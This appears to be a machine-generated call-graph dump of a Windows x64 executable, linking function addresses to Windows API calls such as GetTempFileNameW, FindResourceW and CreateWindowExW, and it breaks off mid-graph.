8834->8837 8836->8837 8838 1400171bf WideCharToMultiByte 8836->8838 8837->8801 8838->8837 8839->8823 8841 14000c2cc 8840->8841 8842 14001106a RtlAllocateHeap TlsSetValue 8840->8842 8843 14001109c 8842->8843 8844 140016fb4 13 API calls 8843->8844 8844->8841 8846 1400126d0 3 API calls 8845->8846 8847 140007ca2 8846->8847 8847->8288 8848->8304 8849->8325 8850->8330 8852 1400123e0 21 API calls 8851->8852 8853 1400047fc 8852->8853 9639 1400122f0 8853->9639 8855 140004819 8856 1400122f0 2 API calls 8855->8856 8857 140004830 8856->8857 9642 1400121c0 GetLastError TlsGetValue SetLastError 8857->9642 8859 14000483e 9643 1400121c0 GetLastError TlsGetValue SetLastError 8859->9643 8861 140004852 9644 140008170 8861->9644 8864 140012210 3 API calls 8865 140004877 8864->8865 9647 1400121c0 GetLastError TlsGetValue SetLastError 8865->9647 8867 1400048a0 8868 140012450 4 API calls 8867->8868 8869 1400048af 8868->8869 9648 1400125a0 TlsGetValue 8869->9648 8871 1400048ba 8872 140012360 HeapFree 8871->8872 8873 1400048d9 8872->8873 8874 140012360 HeapFree 8873->8874 8875 1400048eb 8874->8875 8876 140012360 HeapFree 8875->8876 8877 1400048fd 8876->8877 8877->8335 8878->8340 8879->8342 8880->8344 8881->8346 8882->8350 8883->8356 8884->8358 8885->8360 8886->8362 8887->8366 8889 1400123e0 21 API calls 8888->8889 8890 14000414b 8889->8890 8891 1400122f0 2 API calls 8890->8891 8892 14000415e 8891->8892 8894 140004198 8892->8894 9649 14000350f 8892->9649 8895 140012360 HeapFree 8894->8895 8896 140004207 8895->8896 8897 1400121c0 GetLastError TlsGetValue SetLastError 8896->8897 8897->8374 8898->8376 8900 1400123e0 21 API calls 8899->8900 8901 140002c5e 8900->8901 8902 140002c8b 8901->8902 8903 140003010 8901->8903 9654 1400121c0 GetLastError TlsGetValue SetLastError 8902->9654 9652 1400121c0 GetLastError TlsGetValue SetLastError 8903->9652 8906 14000301f 8908 140012450 4 API calls 8906->8908 8907 140002c95 9655 1400121c0 GetLastError TlsGetValue SetLastError 8907->9655 8910 14000302e 8908->8910 9653 1400125a0 TlsGetValue 8910->9653 8911 140002ca9 9656 1400121c0 GetLastError TlsGetValue SetLastError 8911->9656 8914 140003039 8918 140012360 HeapFree 8914->8918 8915 140002cb9 9657 1400121c0 GetLastError TlsGetValue SetLastError 8915->9657 8917 140002cc9 9658 14000ca80 8917->9658 8920 140003058 8918->8920 8922 140012360 HeapFree 8920->8922 8921 140002cf1 9669 1400125d0 TlsGetValue 8921->9669 8924 14000306a 8922->8924 8926 140012360 HeapFree 8924->8926 8925 140002cfb 9670 140007ef0 8925->9670 8928 14000307c 8926->8928 8930 140012360 HeapFree 8928->8930 8932 14000308e 8930->8932 8931 140012210 3 API calls 8933 140002d1d 8931->8933 8932->8378 9678 1400121c0 GetLastError TlsGetValue SetLastError 8933->9678 8935 140002d27 9679 1400121c0 GetLastError TlsGetValue SetLastError 8935->9679 8937 140002d3b 9680 1400121c0 GetLastError TlsGetValue SetLastError 8937->9680 8939 140002d4b 9681 1400121c0 GetLastError TlsGetValue SetLastError 8939->9681 8941 140002d5b 8942 14000ca80 5 API calls 8941->8942 8943 140002d86 8942->8943 9682 1400125d0 TlsGetValue 8943->9682 8945 140002d90 8946 140007ef0 5 API calls 8945->8946 8947 140002da3 8946->8947 8948 140012210 3 API calls 8947->8948 8949 140002db2 8948->8949 9683 1400121c0 GetLastError TlsGetValue SetLastError 8949->9683 8951 140002dbc 9684 1400121c0 GetLastError TlsGetValue SetLastError 8951->9684 8953 140002dcc 9685 1400121c0 GetLastError TlsGetValue SetLastError 8953->9685 8955 140002dec 9686 1400121c0 GetLastError TlsGetValue SetLastError 8955->9686 8957 140002e00 9687 1400074e0 8957->9687 8959 140002e24 9702 140012520 TlsGetValue 8959->9702 8961 140002e2d 9703 1400121c0 GetLastError TlsGetValue SetLastError 8961->9703 8963 140002e37 9704 1400121c0 GetLastError TlsGetValue SetLastError 8963->9704 8965 140002e47 8966 1400074e0 9 API calls 8965->8966 8967 140002e6b 8966->8967 9705 1400125d0 TlsGetValue 8967->9705 8969 140002e75 9706 1400125d0 TlsGetValue 8969->9706 8971 140002e83 9707 14000b758 8971->9707 8974 140012210 3 API calls 8975 140002eaa 8974->8975 8976 1400124c0 wcscmp 8975->8976 8977 140002eb7 8976->8977 8978 140003005 8977->8978 8979 140002ec0 8977->8979 8981 140002930 35 API calls 8978->8981 9747 1400121c0 GetLastError TlsGetValue SetLastError 8979->9747 8981->8903 8982 140002eca 9748 1400121c0 GetLastError TlsGetValue SetLastError 8982->9748 8984 140002ede 9749 1400121c0 GetLastError TlsGetValue SetLastError 8984->9749 8986 140002ef3 9750 1400121c0 GetLastError TlsGetValue SetLastError 8986->9750 8988 140002f07 8989 140007ef0 5 API calls 8988->8989 8990 140002f1c 8989->8990 9751 1400125d0 TlsGetValue 8990->9751 8992 140002f26 8993 140010ba0 6 API calls 8992->8993 8994 140002f3b 8993->8994 8995 140012210 3 API calls 8994->8995 8996 140002f4a 8995->8996 8997 1400124c0 wcscmp 8996->8997 8998 140002f59 8997->8998 8999 140003003 8998->8999 9752 1400121c0 GetLastError TlsGetValue SetLastError 8998->9752 8999->8903 9001 140002f6c 9753 1400121c0 GetLastError TlsGetValue SetLastError 9001->9753 9003 140002f85 9754 1400121c0 GetLastError TlsGetValue SetLastError 9003->9754 9005 140002f95 9006 1400074e0 9 API calls 9005->9006 9007 140002fb9 9006->9007 9755 140012520 TlsGetValue 9007->9755 9009 140002fc2 9756 1400125d0 TlsGetValue 9009->9756 9011 140002fce 9757 14000b574 9011->9757 9013 140002fe4 9014 140002930 35 API calls 9013->9014 9014->8999 9016 140001e60 9015->9016 9016->9016 9017 1400123e0 21 API calls 9016->9017 9034 140001e7a 9017->9034 9018 140001f54 9789 1400121c0 GetLastError TlsGetValue SetLastError 9018->9789 9020 140001f6e 9790 1400121c0 GetLastError TlsGetValue SetLastError 9020->9790 9021 140007c90 3 API calls 9021->9034 9023 140001f82 9791 14000d9c4 9023->9791 9024 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9024->9034 9027 1400121c0 GetLastError TlsGetValue SetLastError 9027->9034 9028 140012210 3 API calls 9029 140001fa1 GetTempFileNameW 9028->9029 9800 1400121c0 GetLastError TlsGetValue SetLastError 9029->9800 9030 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9030->9034 9032 140001fce 9801 1400121c0 GetLastError TlsGetValue SetLastError 9032->9801 9034->9018 9034->9021 9034->9024 9034->9027 9034->9030 9035 140001fe2 9802 14000ca00 9035->9802 9038 140012210 3 API calls 9039 140002008 9038->9039 9808 14000da6c 9039->9808 9045 14000204f 9819 1400121c0 GetLastError TlsGetValue SetLastError 9045->9819 9047 140002063 9048 14000ca00 4 API calls 9047->9048 9049 140002078 9048->9049 9050 140012210 3 API calls 9049->9050 9051 140002089 9050->9051 9052 14000da6c 2 API calls 9051->9052 9053 140002095 9052->9053 9054 14000d914 3 API calls 9053->9054 9055 1400020a1 GetTempFileNameW PathAddBackslashW 9054->9055 9820 1400121c0 GetLastError TlsGetValue SetLastError 9055->9820 9057 1400020dc 9821 1400121c0 GetLastError TlsGetValue SetLastError 9057->9821 9059 1400020f0 9060 14000ca00 4 API calls 9059->9060 9061 140002105 9060->9061 9062 140012210 3 API calls 9061->9062 9063 140002116 9062->9063 9064 14000da6c 2 API calls 9063->9064 9065 140002122 PathRenameExtensionW GetTempFileNameW 9064->9065 9822 1400121c0 GetLastError TlsGetValue SetLastError 9065->9822 9067 140002162 9823 1400121c0 GetLastError TlsGetValue SetLastError 9067->9823 9069 140002176 9070 14000ca00 4 API calls 9069->9070 9071 14000218b 9070->9071 9072 140012210 3 API calls 9071->9072 9073 14000219c 9072->9073 9074 140012360 HeapFree 9073->9074 9075 1400021ba 9074->9075 9076 140012360 HeapFree 9075->9076 9077 1400021cc 9076->9077 9078 140012360 HeapFree 9077->9078 9079 1400021de 9078->9079 9080 1400067aa 9079->9080 9081 1400123e0 21 API calls 9080->9081 9096 1400067c2 9081->9096 9082 14000689c 9825 1400121c0 GetLastError TlsGetValue SetLastError 9082->9825 9084 1400068a6 9826 1400121c0 GetLastError TlsGetValue SetLastError 9084->9826 9086 1400068b6 9089 1400049ea 84 API calls 9086->9089 9087 140007c90 3 API calls 9087->9096 9088 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9088->9096 9090 1400068e8 9089->9090 9092 140012210 3 API calls 9090->9092 9091 1400121c0 GetLastError TlsGetValue SetLastError 9091->9096 9093 1400068f7 9092->9093 9827 14000dc88 9093->9827 9094 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9094->9096 9096->9082 9096->9087 9096->9088 9096->9091 9096->9094 9098 140012360 HeapFree 9099 140006913 9098->9099 9100 140012360 HeapFree 9099->9100 9101 140006925 9100->9101 9102 140012360 HeapFree 9101->9102 9103 14000633a 9102->9103 9104 1400121c0 GetLastError TlsGetValue SetLastError 9103->9104 9104->8384 9105->8386 9107 1400123e0 21 API calls 9106->9107 9108 140004a05 9107->9108 9109 1400122f0 2 API calls 9108->9109 9110 140004a22 9109->9110 9111 140004a33 9110->9111 9112 140004a79 9110->9112 9832 1400121c0 GetLastError TlsGetValue SetLastError 9111->9832 9113 140004ac2 9112->9113 9114 140004a86 9112->9114 9117 140004b1b 9113->9117 9118 140004acf 9113->9118 9834 1400121c0 GetLastError TlsGetValue SetLastError 9114->9834 9121 140004b74 9117->9121 9122 140004b28 9117->9122 9835 1400121c0 GetLastError TlsGetValue SetLastError 9118->9835 9119 140004a3d 9833 1400121c0 GetLastError TlsGetValue SetLastError 9119->9833 9120 140004a97 9125 140012450 4 API calls 9120->9125 9129 140004b81 9121->9129 9130 140004bcd 9121->9130 9853 1400121c0 GetLastError TlsGetValue SetLastError 9122->9853 9132 140004aa6 9125->9132 9127 140004ad9 9836 1400121c0 GetLastError TlsGetValue SetLastError 9127->9836 9128 140004a4d 9137 14000daa8 5 API calls 9128->9137 9855 1400121c0 GetLastError TlsGetValue SetLastError 9129->9855 9134 140004c26 9130->9134 9135 140004bda 9130->9135 9141 140012210 3 API calls 9132->9141 9133 140004b32 9854 1400121c0 GetLastError TlsGetValue SetLastError 9133->9854 9139 140004c33 9134->9139 9140 140004c7f 9134->9140 9857 1400121c0 GetLastError TlsGetValue SetLastError 9135->9857 9145 140004a5d 9137->9145 9138 140004b8b 9856 1400121c0 GetLastError TlsGetValue SetLastError 9138->9856 9859 1400121c0 GetLastError TlsGetValue SetLastError 9139->9859 9152 140004cd8 9140->9152 9153 140004c8c 9140->9153 9226 140004a70 9141->9226 9144 140004ae9 9837 14000db18 9144->9837 9147 140012210 3 API calls 9145->9147 9147->9226 9150 140004b42 9159 14000db18 17 API calls 9150->9159 9151 140004be4 9858 1400121c0 GetLastError TlsGetValue SetLastError 9151->9858 9157 140004d31 9152->9157 9158 140004ce5 9152->9158 9861 1400121c0 GetLastError TlsGetValue SetLastError 9153->9861 9155 140004b9b 9165 14000db18 17 API calls 9155->9165 9156 140004c3d 9860 1400121c0 GetLastError TlsGetValue SetLastError 9156->9860 9162 140004d8a 9157->9162 9163 140004d3e 9157->9163 9863 1400121c0 GetLastError TlsGetValue SetLastError 9158->9863 9169 140004b58 9159->9169 9179 140004e3a 9162->9179 9180 140004d9b 9162->9180 9865 1400121c0 GetLastError TlsGetValue SetLastError 9163->9865 9164 140012210 3 API calls 9174 140004b12 9164->9174 9175 140004bb1 9165->9175 9181 140012210 3 API calls 9169->9181 9170 140004bf4 9182 14000db18 17 API calls 9170->9182 9171 140004c96 9862 1400121c0 GetLastError TlsGetValue SetLastError 9171->9862 9174->9226 9185 140012210 3 API calls 9175->9185 9176 140004c4d 9186 14000db18 17 API calls 9176->9186 9177 140004e8b 9187 140012450 4 API calls 9177->9187 9178 140004cef 9864 1400121c0 GetLastError TlsGetValue SetLastError 9178->9864 9890 1400121c0 GetLastError TlsGetValue SetLastError 9179->9890 9867 1400121c0 GetLastError TlsGetValue SetLastError 9180->9867 9181->9174 9191 140004c0a 9182->9191 9183 140004ca6 9193 14000db18 17 API calls 9183->9193 9184 140004d48 9866 1400121c0 GetLastError TlsGetValue SetLastError 9184->9866 9185->9174 9195 140004c63 9186->9195 9196 140004e9a 9187->9196 9192 140012210 3 API calls 9191->9192 9192->9174 9201 140004cbc 9193->9201 9203 140012210 3 API calls 9195->9203 9831 1400125a0 TlsGetValue 9196->9831 9197 140004cff 9205 14000db18 17 API calls 9197->9205 9198 140004da5 9868 1400121c0 GetLastError TlsGetValue SetLastError 9198->9868 9199 140004e44 9891 1400121c0 GetLastError TlsGetValue SetLastError 9199->9891 9208 140012210 3 API calls 9201->9208 9202 140004d58 9209 14000db18 17 API calls 9202->9209 9203->9174 9211 140004d15 9205->9211 9207 140004e54 9214 14000daa8 5 API calls 9207->9214 9208->9174 9215 140004d6e 9209->9215 9210 140004ea5 9220 140012360 HeapFree 9210->9220 9216 140012210 3 API calls 9211->9216 9212 140004db5 9869 14000bc94 9212->9869 9218 140004e64 9214->9218 9219 140012210 3 API calls 9215->9219 9216->9174 9222 140012210 3 API calls 9218->9222 9219->9174 9223 140004ec4 9220->9223 9221 140012210 3 API calls 9225 140004dea 9221->9225 9222->9226 9224 140012360 HeapFree 9223->9224 9227 140004ed6 9224->9227 9228 1400124c0 wcscmp 9225->9228 9830 1400121c0 GetLastError TlsGetValue SetLastError 9226->9830 9227->8389 9229 140004dff 9228->9229 9229->9174 9230 140002930 35 API calls 9229->9230 9230->9174 9231->8393 9232->8395 9233->8397 9235 1400123e0 21 API calls 9234->9235 9236 140003cde 9235->9236 9237 1400122f0 2 API calls 9236->9237 9238 140003cfb 9237->9238 9900 1400121c0 GetLastError TlsGetValue SetLastError 9238->9900 9240 140003d2f 9901 1400121c0 GetLastError TlsGetValue SetLastError 9240->9901 9242 140003d43 9243 14000ca80 5 API calls 9242->9243 9244 140003d5f 9243->9244 9245 140012210 3 API calls 9244->9245 9246 140003d6e 9245->9246 9902 1400121c0 GetLastError TlsGetValue SetLastError 9246->9902 9248 140003d87 9249 140012450 4 API calls 9248->9249 9250 140003d96 9249->9250 9903 1400125a0 TlsGetValue 9250->9903 9252 140003da1 9253 140012360 HeapFree 9252->9253 9254 140003dc0 9253->9254 9255 140012360 HeapFree 9254->9255 9256 140003dd2 9255->9256 9257 140012520 TlsGetValue 9256->9257 9257->8401 9258->8403 9260 14000c468 SetEnvironmentVariableW 9259->9260 9261 14000c47c 9259->9261 9260->9261 9261->8405 9262->8407 9263->8415 9264->8417 9266 1400123e0 21 API calls 9265->9266 9267 1400026d1 9266->9267 9904 1400121c0 GetLastError TlsGetValue SetLastError 9267->9904 9269 1400026e5 9905 1400121c0 GetLastError TlsGetValue SetLastError 9269->9905 9271 1400026f9 9272 14000c0c4 5 API calls 9271->9272 9273 140002709 9272->9273 9274 140012210 3 API calls 9273->9274 9275 140002718 9274->9275 9276 1400027c0 9275->9276 9277 140002730 9275->9277 9973 1400121c0 GetLastError TlsGetValue SetLastError 9276->9973 9908 1400121c0 GetLastError TlsGetValue SetLastError 9277->9908 9280 14000273a 9909 1400121c0 GetLastError TlsGetValue SetLastError 9280->9909 9281 1400027cf 9283 140012450 4 API calls 9281->9283 9284 1400027de 9283->9284 9286 140012210 3 API calls 9284->9286 9285 14000274a 9910 1400031f5 9285->9910 9288 1400027be 9286->9288 9906 1400121c0 GetLastError TlsGetValue SetLastError 9288->9906 9290 140012210 3 API calls 9292 140002768 9290->9292 9972 1400121c0 GetLastError TlsGetValue SetLastError 9292->9972 9293 1400027fc 9295 140012450 4 API calls 9293->9295 9297 14000280b 9295->9297 9296 140002777 9298 140012450 4 API calls 9296->9298 9907 1400125a0 TlsGetValue 9297->9907 9300 140002786 9298->9300 9302 140012450 4 API calls 9300->9302 9301 140002816 9303 140012360 HeapFree 9301->9303 9304 14000279d 9302->9304 9305 140002835 9303->9305 9306 140012450 4 API calls 9304->9306 9307 140012360 HeapFree 9305->9307 9308 1400027af 9306->9308 9309 140002847 9307->9309 9310 140012210 3 API calls 9308->9310 9309->8420 9310->9288 9312 140004eeb 9311->9312 9312->9312 9313 1400123e0 21 API calls 9312->9313 9332 140004f05 9313->9332 9314 140004fdf 9997 1400121c0 GetLastError TlsGetValue SetLastError 9314->9997 9315 1400121c0 GetLastError TlsGetValue SetLastError 9315->9332 9317 140004fe9 9998 1400121c0 GetLastError TlsGetValue SetLastError 9317->9998 9319 140004ffd 9999 1400121c0 GetLastError TlsGetValue SetLastError 9319->9999 9320 140007c90 3 API calls 9320->9332 9322 14000500d 10000 1400121c0 GetLastError TlsGetValue SetLastError 9322->10000 9323 140012210 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9323->9332 9325 14000501d 9326 140010ba0 6 API calls 9325->9326 9327 14000503b 9326->9327 10001 1400125d0 TlsGetValue 9327->10001 9328 140012450 wcslen TlsGetValue RtlReAllocateHeap RtlReAllocateHeap 9328->9332 9330 140005045 9331 140007dc0 6 API calls 9330->9331 9333 140005058 9331->9333 9332->9314 9332->9315 9332->9320 9332->9323 9332->9328 9334 140012210 3 API calls 9333->9334 9335 140005067 9334->9335 10002 1400121c0 GetLastError TlsGetValue SetLastError 9335->10002 9337 140005071 10003 1400121c0 GetLastError TlsGetValue SetLastError 9337->10003 9339 140005085 10004 1400121c0 GetLastError TlsGetValue SetLastError 9339->10004 9341 140005095 10005 1400121c0 GetLastError TlsGetValue SetLastError 9341->10005 9343 1400050a5 9344 140010ba0 6 API calls 9343->9344 9345 1400050c3 9344->9345 10006 1400125d0 TlsGetValue 9345->10006 9347 1400050cd 9348 140007dc0 6 API calls 9347->9348 9349 1400050e0 9348->9349 9350 140012210 3 API calls 9349->9350 9351 1400050ef 9350->9351 10007 1400121c0 GetLastError TlsGetValue SetLastError 9351->10007 9353 1400050f9 10008 1400121c0 GetLastError TlsGetValue SetLastError 9353->10008 9355 14000510d 10009 1400121c0 GetLastError TlsGetValue SetLastError 9355->10009 9357 14000511d 10010 1400121c0 GetLastError TlsGetValue SetLastError 9357->10010 9359 14000512d 9360 140010ba0 6 API calls 9359->9360 9361 140005149 9360->9361 10011 1400125d0 TlsGetValue 9361->10011 9363 140005153 9364 140007dc0 6 API calls 9363->9364 9365 140005166 9364->9365 9366 140012210 3 API calls 9365->9366 9367 140005175 9366->9367 10012 1400121c0 GetLastError TlsGetValue SetLastError 9367->10012 9369 14000517f 10013 1400121c0 GetLastError TlsGetValue SetLastError 9369->10013 9371 140005193 10014 1400121c0 GetLastError TlsGetValue SetLastError 9371->10014 9373 1400051a3 10015 1400121c0 GetLastError TlsGetValue SetLastError 9373->10015 9375 1400051b3 9376 140010ba0 6 API calls 9375->9376 9377 1400051d2 9376->9377 10016 1400125d0 TlsGetValue 9377->10016 9379 1400051dc 9380 140007dc0 6 API calls 9379->9380 9381 1400051ef 9380->9381 9382 140012210 3 API calls 9381->9382 9383 1400051fe 9382->9383 10017 1400121c0 GetLastError TlsGetValue SetLastError 9383->10017 9385 140005208 10018 1400121c0 GetLastError TlsGetValue SetLastError 9385->10018 9387 14000521c 10019 1400121c0 GetLastError TlsGetValue SetLastError 9387->10019 9389 14000522c 10020 1400121c0 GetLastError TlsGetValue SetLastError 9389->10020 9391 14000523c 9392 140010ba0 6 API calls 9391->9392 9393 14000525b 9392->9393 10021 1400125d0 TlsGetValue 9393->10021 9395 140005265 9396 140007dc0 6 API calls 9395->9396 9397 140005278 9396->9397 9398 140012210 3 API calls 9397->9398 9399 140005287 9398->9399 10022 1400121c0 GetLastError TlsGetValue SetLastError 9399->10022 9401 140005291 10023 1400121c0 GetLastError TlsGetValue SetLastError 9401->10023 9403 1400052a1 10024 140005794 9403->10024 9405 1400052be 10057 1400121c0 GetLastError TlsGetValue SetLastError 9405->10057 9407 1400052dc 10058 1400121c0 GetLastError TlsGetValue SetLastError 9407->10058 9409 1400052ec 9410 140005794 65 API calls 9409->9410 9411 140005306 9410->9411 9412 140012210 3 API calls 9411->9412 9413 140005317 9412->9413 10059 1400121c0 GetLastError TlsGetValue SetLastError 9413->10059 9415 140005321 10060 1400121c0 GetLastError TlsGetValue SetLastError 9415->10060 9417 140005331 9418 140005794 65 API calls 9417->9418 9419 14000534b 9418->9419 9420 140012210 3 API calls 9419->9420 9421 14000535a 9420->9421 10061 1400121c0 GetLastError TlsGetValue SetLastError 9421->10061 9423 140005364 10062 1400121c0 GetLastError TlsGetValue SetLastError 9423->10062 9425 140005374 9426 140005794 65 API calls 9425->9426 9427 14000538e 9426->9427 9428 140012210 3 API calls 9427->9428 9429 1400053a0 9428->9429 10063 1400121c0 GetLastError TlsGetValue SetLastError 9429->10063 9431 1400053aa 10064 1400121c0 GetLastError TlsGetValue SetLastError 9431->10064 9433 1400053ba 9434 140005794 65 API calls 9433->9434 9435 1400053d4 9434->9435 9436 140012210 3 API calls 9435->9436 9437 1400053e6 9436->9437 10065 1400121c0 GetLastError TlsGetValue SetLastError 9437->10065 9439 1400053f0 10066 1400121c0 GetLastError TlsGetValue SetLastError 9439->10066 9441 140005404 10067 1400121c0 GetLastError TlsGetValue SetLastError 9441->10067 9443 140005414 10068 1400121c0 GetLastError TlsGetValue SetLastError 9443->10068 9445 140005428 9446 140003cc9 37 API calls 9445->9446 9447 14000543e 9446->9447 10069 140012520 TlsGetValue 9447->10069 9449 140005447 10070 1400125d0 TlsGetValue 9449->10070 9451 14000545f 10071 1400081d0 9451->10071 9454 140012210 3 API calls 9455 140005486 9454->9455 10074 1400121c0 GetLastError TlsGetValue SetLastError 9455->10074 9457 140005490 10075 1400121c0 GetLastError TlsGetValue SetLastError 9457->10075 9459 1400054a4 10076 1400121c0 GetLastError TlsGetValue SetLastError 9459->10076 9461 1400054b4 10077 1400121c0 GetLastError TlsGetValue SetLastError 9461->10077 9463 1400054c8 9464 140003cc9 37 API calls 9463->9464 9465 1400054de 9464->9465 10078 140012520 TlsGetValue 9465->10078 9467 1400054e7 10079 1400125d0 TlsGetValue 9467->10079 9469 1400054ff 9470 1400081d0 13 API calls 9469->9470 9471 140005517 9470->9471 9472 140012210 3 API calls 9471->9472 9473 140005526 9472->9473 10080 1400121c0 GetLastError TlsGetValue SetLastError 9473->10080 9475 140005530 10081 1400121c0 GetLastError TlsGetValue SetLastError 9475->10081 9477 140005549 9478 140012450 4 API calls 9477->9478 9479 140005558 9478->9479 9480 140012450 4 API calls 9479->9480 9481 14000556f 9480->9481 9482 140012450 4 API calls 9481->9482 9483 140005584 9482->9483 9484 140012450 4 API calls 9483->9484 9485 140005599 9484->9485 9486 140012450 4 API calls 9485->9486 9487 1400055ae 9486->9487 10082 140012520 TlsGetValue 9487->10082 9489 1400055b7 10083 1400125d0 TlsGetValue 9489->10083 9491 1400055c3 10084 14000309a 9491->10084 9493 1400055d7 9494 140012360 HeapFree 9493->9494 9495 1400055fd 9494->9495 9496 140012360 HeapFree 9495->9496 9497 14000560f 9496->9497 9498 140012360 HeapFree 9497->9498 9499 140005621 9498->9499 9500 140012360 HeapFree 9499->9500 9501 140005633 9500->9501 9502 140012360 HeapFree 9501->9502 9503 140005648 9502->9503 9504 140012360 HeapFree 9503->9504 9505 14000565a 9504->9505 9506 140012360 HeapFree 9505->9506 9507 14000566f 9506->9507 9508 140012360 HeapFree 9507->9508 9509 140005681 9508->9509 9510 140012360 HeapFree 9509->9510 9511 140005693 9510->9511 9512 140012360 HeapFree 9511->9512 9513 1400056a5 9512->9513 9514 1400121c0 GetLastError TlsGetValue SetLastError 9513->9514 9514->8425 9515->8431 9517 1400072c5 RtlEnterCriticalSection 9516->9517 9518 14000734a 9516->9518 9519 14000730b 9517->9519 9518->8444 9520 140007313 9519->9520 9521 1400072db WaitForSingleObject 9519->9521 9522 140011cb0 RtlAllocateHeap 9520->9522 9521->9519 9523 1400072ee CloseHandle 9521->9523 9524 140007336 RtlLeaveCriticalSection 9522->9524 9525 140011c68 HeapFree 9523->9525 9524->9518 9526 140007309 9525->9526 9526->9519 9527->8446 9528->8448 9529->8456 9530->8458 9531->8460 9533 1400126d0 3 API calls 9532->9533 9534 14000daca GetCurrentDirectoryW 9533->9534 9535 14000dae1 9534->9535 10241 140012900 TlsGetValue 9535->10241 9537 14000663c 9538 140012520 TlsGetValue 9537->9538 9538->8464 9539->8466 9540->8472 9541->8474 9542->8476 9544 1400029e1 9543->9544 9544->9544 9545 1400123e0 21 API calls 9544->9545 9546 1400029fb 9545->9546 9547 1400122f0 2 API calls 9546->9547 9548 140002a11 9547->9548 9549 1400122f0 2 API calls 9548->9549 9550 140002a2b 9549->9550 9551 1400122f0 2 API calls 9550->9551 9553 140002a45 9551->9553 9552 140002ac7 GetExitCodeProcess 9552->9553 9553->9552 9554 140002af8 9553->9554 9555 140012360 HeapFree 9554->9555 9556 140002b18 9555->9556 9557 140012360 HeapFree 9556->9557 9558 140002b2a 9557->9558 9559 140012360 HeapFree 9558->9559 9560 140002b3c 9559->9560 9560->8478 9578 140003dea 9577->9578 9578->9578 9579 1400123e0 21 API calls 9578->9579 9580 140003e04 9579->9580 9581 1400122f0 2 API calls 9580->9581 9582 140003e17 9581->9582 9583 140003e6d 9582->9583 10268 1400121c0 GetLastError TlsGetValue SetLastError 9582->10268 10270 1400121c0 GetLastError TlsGetValue SetLastError 9583->10270 9586 140003e77 10271 1400121c0 GetLastError TlsGetValue SetLastError 9586->10271 9587 140003e30 10269 1400121c0 GetLastError TlsGetValue SetLastError 9587->10269 9590 140003e8b 10272 1400121c0 GetLastError TlsGetValue SetLastError 9590->10272 9591 140003e44 9593 14000ca00 4 API calls 9591->9593 9595 140003e5e 9593->9595 9594 140003e9b 10273 1400121c0 GetLastError TlsGetValue SetLastError 9594->10273 9597 140012210 3 API calls 9595->9597 9597->9583 9598 140003eab 9599 140010ba0 6 API calls 9598->9599 9600 140003ec7 9599->9600 10274 1400125d0 TlsGetValue 9600->10274 9602 140003ed1 9603 140007dc0 6 API calls 9602->9603 9604 140003ee4 9603->9604 9605 140012210 3 API calls 9604->9605 9606 140003ef3 FindResourceW 9605->9606 9607 140003f1c 9606->9607 9608 14000402d 9606->9608 9609 14000350f 21 API calls 9607->9609 9610 1400124c0 wcscmp 9608->9610 9611 140003f2d 9609->9611 9612 14000403c 9610->9612 9617 140001284 8 API calls 9611->9617 9613 14000404c 9612->9613 9614 140004070 9612->9614 9621 140004067 9612->9621 9618 140007284 7 API calls 9613->9618 10279 140003592 9614->10279 9615 140012360 HeapFree 9619 14000408e 9615->9619 9620 140003f66 9617->9620 9618->9621 9622 140012360 HeapFree 9619->9622 10275 1400121c0 GetLastError TlsGetValue SetLastError 9620->10275 9621->9615 9624 1400040a0 9622->9624 9624->8444 9625 140003f70 10276 1400121c0 GetLastError TlsGetValue SetLastError 9625->10276 9627 140003f84 9628 14000ca80 5 API calls 9627->9628 9629 140003fa1 9628->9629 9630 140012210 3 API calls 9629->9630 9631 140003fb2 9630->9631 10277 1400121c0 GetLastError TlsGetValue SetLastError 9631->10277 9633 140003fe3 10278 1400121c0 GetLastError TlsGetValue SetLastError 9633->10278 9635 140003ff7 9636 140007e50 5 API calls 9635->9636 9637 14000401c 9636->9637 9638 140012210 3 API calls 9637->9638 9638->9608 9640 140012351 9639->9640 9641 140012306 wcslen RtlAllocateHeap 9639->9641 9640->8855 9641->9640 9642->8859 9643->8861 9645 1400126d0 3 API calls 9644->9645 9646 140004868 9645->9646 9646->8864 9647->8867 9648->8871 9650 1400123e0 21 API calls 9649->9650 9651 140003527 9650->9651 9651->8894 9652->8906 9653->8914 9654->8907 9655->8911 9656->8915 9657->8917 9659 14000caa8 9658->9659 9662 14000ca00 9658->9662 9660 1400126d0 3 API calls 9659->9660 9661 14000cac5 9660->9661 9764 140012900 TlsGetValue 9661->9764 9662->9662 9663 1400126d0 3 API calls 9662->9663 9665 14000ca34 9663->9665 9667 14000ca3b memcpy 9665->9667 9668 14000ca4c 9665->9668 9666 14000caf1 9666->8921 9667->9668 9668->8921 9669->8925 9671 140007f00 9670->9671 9672 140012630 TlsGetValue 9671->9672 9673 140007fa9 9672->9673 9674 1400126d0 3 API calls 9673->9674 9675 140007fb7 9674->9675 9676 140002d0e 9675->9676 9765 140012850 TlsGetValue 9675->9765 9676->8931 9678->8935 9679->8937 9680->8939 9681->8941 9682->8945 9683->8951 9684->8953 9685->8955 9686->8957 9688 140007644 TlsGetValue 9687->9688 9693 140007501 9687->9693 9688->8959 9690 140007592 9692 140012630 TlsGetValue 9690->9692 9691 140007560 wcsncmp 9691->9693 9694 1400075a6 9692->9694 9693->9690 9693->9691 9695 1400075ca 9694->9695 9766 1400126a0 TlsGetValue 9694->9766 9697 1400126d0 3 API calls 9695->9697 9699 1400075d4 9697->9699 9698 1400075b9 memcpy 9698->9695 9700 1400075ee 9699->9700 9701 1400075e0 wcsncpy 9699->9701 9700->8959 9701->9700 9702->8961 9703->8963 9704->8965 9705->8969 9706->8971 9767 14000b5d8 9707->9767 9709 14000b790 9710 14000b5d8 2 API calls 9709->9710 9711 14000b79b 9710->9711 9712 14000b5d8 2 API calls 9711->9712 9713 14000b7a6 9712->9713 9714 14000b7b2 GetStockObject 9713->9714 9715 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9713->9715 9714->9715 9770 14000be5c GetForegroundWindow 9715->9770 9720 14000b859 IsWindowEnabled 9721 14000b87a 9720->9721 9722 14000b863 EnableWindow 9720->9722 9723 14000be5c 3 API calls 9721->9723 9722->9721 9724 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 9723->9724 9725 14000b902 6 API calls 9724->9725 9727 14000bb96 9724->9727 9728 14000ba12 